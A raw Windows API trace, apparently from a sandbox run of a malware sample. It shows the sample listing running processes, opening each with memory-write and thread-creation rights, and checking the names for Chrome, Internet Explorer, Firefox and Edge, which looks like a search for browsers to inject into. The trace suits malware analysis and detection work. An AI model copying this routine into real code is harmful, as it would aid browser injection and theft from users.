	[0216.914] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.914] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0216.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x49e0
	[0216.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.915] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0216.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.915] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.916] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0216.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.916] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.916] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0216.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x49e4
	[0216.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.917] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0216.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.918] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.918] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0216.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.918] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.918] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0216.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x49e8
	[0216.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.919] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0216.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.919] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.920] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0216.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.920] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.920] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0216.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x49ec
	[0216.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.921] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0216.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.922] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.922] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0216.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.922] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.922] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0216.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x49f0
	[0216.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.923] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0216.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.924] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.924] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0216.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.924] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.924] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0216.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x49f4
	[0216.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.925] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.925] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.926] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.926] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.926] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x49f8
	[0216.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.927] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.927] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.928] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.928] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.928] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x49fc
	[0216.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.929] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.929] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.929] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.930] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4a00
	[0216.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.931] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.931] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.931] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.932] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.932] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4a04
	[0216.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.933] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.933] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.933] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.934] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.934] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4a08
	[0216.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.935] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.935] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.936] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.936] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.936] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4a0c
	[0216.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.937] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.937] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.938] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.938] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.938] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4a10
	[0216.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.939] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.939] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.940] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.940] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0216.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4a14
	[0216.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.941] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0216.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.941] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.942] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0216.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.942] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4a18
	[0216.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.943] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.943] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.944] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.944] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0216.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4a1c
	[0216.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.945] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.945] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.946] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.946] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0216.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4a20
	[0216.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.947] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0216.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.947] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.948] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0216.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.948] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0216.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4a24
	[0216.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0216.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.949] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.950] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0216.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.951] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.951] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0216.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4a28
	[0216.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.952] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0216.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.952] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.952] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0216.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.953] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.953] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0216.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4a2c
	[0216.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.987] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0216.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.987] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.988] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0216.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.988] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.988] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0216.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4a30
	[0216.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.989] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0216.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.989] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.989] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0216.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.990] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.990] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0216.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x4a34
	[0216.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.991] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0216.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.991] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.992] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0216.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.992] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.992] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0216.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0216.993] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0216.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4a38
	[0216.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.994] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0216.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.995] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.995] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0216.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.996] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.996] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0216.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4a3c
	[0216.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.997] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0216.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.998] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0216.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.998] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0216.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.998] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0216.998] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0216.999] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4a40
	[0216.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
